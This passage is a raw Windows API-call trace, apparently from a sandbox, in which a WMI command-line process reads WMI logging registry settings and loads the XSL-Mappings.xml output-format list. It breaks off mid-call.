[0306.599] SysStringLen (param_1="DEFAULT") returned 0x7 [0306.599] SysStringLen (param_1="CALL") returned 0x4 [0306.599] SysStringLen (param_1="CONNECT") returned 0x7 [0306.599] malloc (_Size=0x18) returned 0x32204b8 [0306.599] malloc (_Size=0xc) returned 0x32204d8 [0306.599] SysStringLen (param_1="PKT") returned 0x3 [0306.599] SysStringLen (param_1="DEFAULT") returned 0x7 [0306.599] SysStringLen (param_1="PKT") returned 0x3 [0306.599] SysStringLen (param_1="NONE") returned 0x4 [0306.599] SysStringLen (param_1="NONE") returned 0x4 [0306.599] SysStringLen (param_1="PKT") returned 0x3 [0306.599] malloc (_Size=0x18) returned 0x3222d40 [0306.599] malloc (_Size=0xc) returned 0x32204f0 [0306.599] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0306.599] SysStringLen (param_1="DEFAULT") returned 0x7 [0306.599] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0306.599] SysStringLen (param_1="NONE") returned 0x4 [0306.599] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0306.599] SysStringLen (param_1="PKT") returned 0x3 [0306.600] SysStringLen (param_1="PKT") returned 0x3 [0306.600] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0306.600] malloc (_Size=0x18) returned 0x3222c20 [0306.600] malloc (_Size=0xc) returned 0x3220508 [0306.600] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0306.600] SysStringLen (param_1="DEFAULT") returned 0x7 [0306.600] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0306.600] SysStringLen (param_1="PKT") returned 0x3 [0306.600] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0306.600] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0306.600] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0306.600] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0306.600] malloc (_Size=0x18) returned 0x3222ac0 [0306.600] malloc (_Size=0x40) returned 0x3220520 [0306.600] malloc (_Size=0x20a) returned 0x32297c8 [0306.600] GetSystemDirectoryW (in: lpBuffer=0x32297c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0306.600] free (_Block=0x32297c8) [0306.600] malloc (_Size=0xc) returned 0x3220568 [0306.600] malloc (_Size=0xc) returned 0x3220580 [0306.600] malloc (_Size=0xc) returned 0x3222d80 [0306.600] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0306.600] SysStringLen (param_1="\\wbem\\") returned 0x6 [0306.600] free (_Block=0x3220568) [0306.601] free (_Block=0x3220580) [0306.601] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0306.601] free (_Block=0x3222d80) [0306.601] malloc (_Size=0xc) returned 0x32298b0 [0306.601] malloc (_Size=0xc) returned 0x3229910 [0306.601] malloc (_Size=0xc) returned 0x3229808 [0306.601] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0306.601] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0306.601] free (_Block=0x32298b0) [0306.601] free (_Block=0x3229910) [0306.601] GetCurrentThreadId () returned 0x3e0 [0306.601] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2ecf7a0 | out: phkResult=0x2ecf7a0*=0x1a0) returned 0x0 [0306.601] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x2ecf7ac, lpcbData=0x2ecf7a8*=0x400 | out: lpType=0x0, lpData=0x2ecf7ac*=0x30, lpcbData=0x2ecf7a8*=0x4) returned 0x0 [0306.601] _wcsicmp (_String1="0", _String2="1") returned -1 [0306.601] _wcsicmp (_String1="0", _String2="2") returned -2 [0306.601] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x2ecf7a8*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x2ecf7a8*=0x42) returned 0x0 [0306.601] malloc (_Size=0x86) returned 0x3222d80 [0306.601] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3222d80, lpcbData=0x2ecf7a8*=0x42 | out: lpType=0x0, lpData=0x3222d80*=0x25, lpcbData=0x2ecf7a8*=0x42) returned 0x0 [0306.602] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0306.602] malloc (_Size=0x42) returned 0x3222e10 [0306.602] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0306.602] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x2ecf7ac, lpcbData=0x2ecf7a8*=0x400 | out: lpType=0x0, lpData=0x2ecf7ac*=0x36, lpcbData=0x2ecf7a8*=0xc) returned 0x0 [0306.602] _wtol (_String="65536") returned 65536 [0306.602] free (_Block=0x3222d80) [0306.602] RegCloseKey (hKey=0x0) returned 0x6 [0306.602] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x2ecfc3c | out: ppv=0x2ecfc3c*=0x36845a8) returned 0x0 [0306.623] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x36845a8, xmlSource=0x2ecfbc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x2ecfc28 | out: isSuccessful=0x2ecfc28*=0xffff) returned 0x0 [0306.775] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x36845a8, DOMElement=0x2ecfc38 | out: DOMElement=0x2ecfc38*=0x3686b48) returned 0x0 [0306.776] malloc (_Size=0xc) returned 0x3229850 [0306.777] IXMLDOMElement:getElementsByTagName (in: This=0x3686b48, tagName="XSLFORMAT", resultList=0x2ecfc34 | out: resultList=0x2ecfc34*=0x3689ca0) returned 0x0 [0306.778] free (_Block=0x3229850) [0306.778] IXMLDOMNodeList:get_length (in: This=0x3689ca0, listLength=0x2ecfc30 | out: listLength=0x2ecfc30*=21) returned 0x0 [0306.778] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=0, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.778] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="texttable.xsl") returned 0x0 [0306.779] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.779] malloc (_Size=0xc) returned 0x3229988 [0306.779] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.779] free (_Block=0x3229988) [0306.779] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0306.779] malloc (_Size=0xc) returned 0x3229868 [0306.779] malloc (_Size=0xc) returned 0x3229940 [0306.780] malloc (_Size=0x18) returned 0x3222b40 [0306.781] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.781] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.781] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.781] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=1, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.781] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="textvaluelist.xsl") returned 0x0 [0306.781] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.781] malloc (_Size=0xc) returned 0x3229850 [0306.781] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.782] free (_Block=0x3229850) [0306.782] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0306.782] malloc (_Size=0xc) returned 0x32297f0 [0306.782] malloc (_Size=0xc) returned 0x3229880 [0306.782] SysStringLen (param_1="VALUE") returned 0x5 [0306.782] SysStringLen (param_1="TABLE") returned 0x5 [0306.782] SysStringLen (param_1="TABLE") returned 0x5 [0306.782] SysStringLen (param_1="VALUE") returned 0x5 [0306.782] malloc (_Size=0x18) returned 0x3222ce0 [0306.782] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.782] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.782] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.782] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=2, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.782] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="textvaluelist.xsl") returned 0x0 [0306.783] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.783] malloc (_Size=0xc) returned 0x3229838 [0306.783] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.783] free (_Block=0x3229838) [0306.783] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0306.783] malloc (_Size=0xc) returned 0x3229970 [0306.783] malloc (_Size=0xc) returned 0x32298e0 [0306.783] SysStringLen (param_1="LIST") returned 0x4 [0306.783] SysStringLen (param_1="TABLE") returned 0x5 [0306.783] malloc (_Size=0x18) returned 0x3222b80 [0306.783] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.783] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.783] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.784] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=3, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.784] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="rawxml.xsl") returned 0x0 [0306.784] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.784] malloc (_Size=0xc) returned 0x32298c8 [0306.784] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.784] free (_Block=0x32298c8) [0306.784] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0306.784] malloc (_Size=0xc) returned 0x3229988 [0306.784] malloc (_Size=0xc) returned 0x32299a0 [0306.784] SysStringLen (param_1="RAWXML") returned 0x6 [0306.784] SysStringLen (param_1="TABLE") returned 0x5 [0306.785] SysStringLen (param_1="RAWXML") returned 0x6 [0306.785] SysStringLen (param_1="LIST") returned 0x4 [0306.785] SysStringLen (param_1="LIST") returned 0x4 [0306.785] SysStringLen (param_1="RAWXML") returned 0x6 [0306.785] malloc (_Size=0x18) returned 0x3222a20 [0306.785] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.785] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.785] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.785] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=4, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.785] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="htable.xsl") returned 0x0 [0306.785] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.785] malloc (_Size=0xc) returned 0x3229820 [0306.785] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.786] free (_Block=0x3229820) [0306.786] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0306.786] malloc (_Size=0xc) returned 0x3229898 [0306.786] malloc (_Size=0xc) returned 0x32298b0 [0306.786] SysStringLen (param_1="HTABLE") returned 0x6 [0306.786] SysStringLen (param_1="TABLE") returned 0x5 [0306.786] SysStringLen (param_1="HTABLE") returned 0x6 [0306.786] SysStringLen (param_1="LIST") returned 0x4 [0306.786] malloc (_Size=0x18) returned 0x3222d20 [0306.786] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.786] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.786] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.786] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=5, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.787] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="hform.xsl") returned 0x0 [0306.787] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.787] malloc (_Size=0xc) returned 0x32298f8 [0306.787] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.787] free (_Block=0x32298f8) [0306.787] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0306.787] malloc (_Size=0xc) returned 0x32298f8 [0306.787] malloc (_Size=0xc) returned 0x32299b8 [0306.787] SysStringLen (param_1="HFORM") returned 0x5 [0306.787] SysStringLen (param_1="TABLE") returned 0x5 [0306.787] SysStringLen (param_1="HFORM") returned 0x5 [0306.787] SysStringLen (param_1="LIST") returned 0x4 [0306.787] SysStringLen (param_1="HFORM") returned 0x5 [0306.787] SysStringLen (param_1="HTABLE") returned 0x6 [0306.787] malloc (_Size=0x18) returned 0x3222c60 [0306.788] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.788] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.788] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.788] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=6, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.788] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="xml.xsl") returned 0x0 [0306.788] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.788] malloc (_Size=0xc) returned 0x3229820 [0306.788] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.788] free (_Block=0x3229820) [0306.788] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0306.789] malloc (_Size=0xc) returned 0x32298c8 [0306.789] malloc (_Size=0xc) returned 0x3229820 [0306.789] SysStringLen (param_1="XML") returned 0x3 [0306.789] SysStringLen (param_1="TABLE") returned 0x5 [0306.789] SysStringLen (param_1="XML") returned 0x3 [0306.789] SysStringLen (param_1="VALUE") returned 0x5 [0306.789] SysStringLen (param_1="VALUE") returned 0x5 [0306.789] SysStringLen (param_1="XML") returned 0x3 [0306.789] malloc (_Size=0x18) returned 0x3222ae0 [0306.789] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.789] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.789] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.789] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=7, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.789] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="mof.xsl") returned 0x0 [0306.789] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.790] malloc (_Size=0xc) returned 0x3229838 [0306.790] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.790] free (_Block=0x3229838) [0306.790] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0306.790] malloc (_Size=0xc) returned 0x3229910 [0306.790] malloc (_Size=0xc) returned 0x3229850 [0306.790] SysStringLen (param_1="MOF") returned 0x3 [0306.790] SysStringLen (param_1="TABLE") returned 0x5 [0306.790] SysStringLen (param_1="MOF") returned 0x3 [0306.790] SysStringLen (param_1="LIST") returned 0x4 [0306.790] SysStringLen (param_1="MOF") returned 0x3 [0306.790] SysStringLen (param_1="RAWXML") returned 0x6 [0306.790] SysStringLen (param_1="LIST") returned 0x4 [0306.790] SysStringLen (param_1="MOF") returned 0x3 [0306.790] malloc (_Size=0x18) returned 0x3222a80 [0306.790] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.791] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.791] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.791] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=8, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.791] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="csv.xsl") returned 0x0 [0306.791] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.791] malloc (_Size=0xc) returned 0x3229838 [0306.791] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.791] free (_Block=0x3229838) [0306.791] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0306.791] malloc (_Size=0xc) returned 0x3229838 [0306.791] malloc (_Size=0xc) returned 0x3229928 [0306.792] SysStringLen (param_1="CSV") returned 0x3 [0306.792] SysStringLen (param_1="TABLE") returned 0x5 [0306.792] SysStringLen (param_1="CSV") returned 0x3 [0306.792] SysStringLen (param_1="LIST") returned 0x4 [0306.792] SysStringLen (param_1="CSV") returned 0x3 [0306.792] SysStringLen (param_1="HTABLE") returned 0x6 [0306.792] SysStringLen (param_1="CSV") returned 0x3 [0306.792] SysStringLen (param_1="HFORM") returned 0x5 [0306.792] malloc (_Size=0x18) returned 0x3222a40 [0306.792] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.792] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.792] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.792] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=9, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.792] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="texttable.xsl") returned 0x0 [0306.792] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.792] malloc (_Size=0xc) returned 0x3229958 [0306.792] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.793] free (_Block=0x3229958) [0306.793] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0306.793] malloc (_Size=0xc) returned 0x3229958 [0306.793] malloc (_Size=0xc) returned 0x322ac90 [0306.793] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.793] SysStringLen (param_1="TABLE") returned 0x5 [0306.793] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.793] SysStringLen (param_1="VALUE") returned 0x5 [0306.793] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.793] SysStringLen (param_1="XML") returned 0x3 [0306.793] SysStringLen (param_1="XML") returned 0x3 [0306.793] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.793] malloc (_Size=0x18) returned 0x3222cc0 [0306.793] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.793] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.793] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.793] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=10, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.793] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="texttable.xsl") returned 0x0 [0306.793] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.793] malloc (_Size=0xc) returned 0x322ab88 [0306.793] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.794] free (_Block=0x322ab88) [0306.794] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0306.794] malloc (_Size=0xc) returned 0x322adb0 [0306.794] malloc (_Size=0xc) returned 0x322abb8 [0306.794] SysStringLen (param_1="texttablewsys") returned 0xd [0306.794] SysStringLen (param_1="TABLE") returned 0x5 [0306.794] SysStringLen (param_1="texttablewsys") returned 0xd [0306.794] SysStringLen (param_1="XML") returned 0x3 [0306.794] SysStringLen (param_1="texttablewsys") returned 0xd [0306.794] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.794] SysStringLen (param_1="XML") returned 0x3 [0306.794] SysStringLen (param_1="texttablewsys") returned 0xd [0306.794] malloc (_Size=0x18) returned 0x3222d00 [0306.794] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.794] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.794] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.794] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=11, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.794] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="texttable.xsl") returned 0x0 [0306.794] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.794] malloc (_Size=0xc) returned 0x322abe8 [0306.794] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.795] free (_Block=0x322abe8) [0306.795] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0306.795] malloc (_Size=0xc) returned 0x322ac78 [0306.795] malloc (_Size=0xc) returned 0x322ad08 [0306.795] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.795] SysStringLen (param_1="TABLE") returned 0x5 [0306.795] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.795] SysStringLen (param_1="XML") returned 0x3 [0306.795] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.795] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.795] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.795] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.795] malloc (_Size=0x18) returned 0x3222a00 [0306.795] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.795] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.795] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.796] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=12, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.796] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="texttable.xsl") returned 0x0 [0306.796] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.796] malloc (_Size=0xc) returned 0x322ac48 [0306.796] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.796] free (_Block=0x322ac48) [0306.796] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0306.796] malloc (_Size=0xc) returned 0x322ab40 [0306.796] malloc (_Size=0xc) returned 0x322ac00 [0306.796] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0306.796] SysStringLen (param_1="TABLE") returned 0x5 [0306.796] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0306.796] SysStringLen (param_1="XML") returned 0x3 [0306.796] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0306.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.797] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0306.797] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.797] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0306.797] malloc (_Size=0x18) returned 0x3222ca0 [0306.797] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.797] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.797] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.797] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=13, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.797] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="texttable.xsl") returned 0x0 [0306.797] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.797] malloc (_Size=0xc) returned 0x322ab58 [0306.797] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", 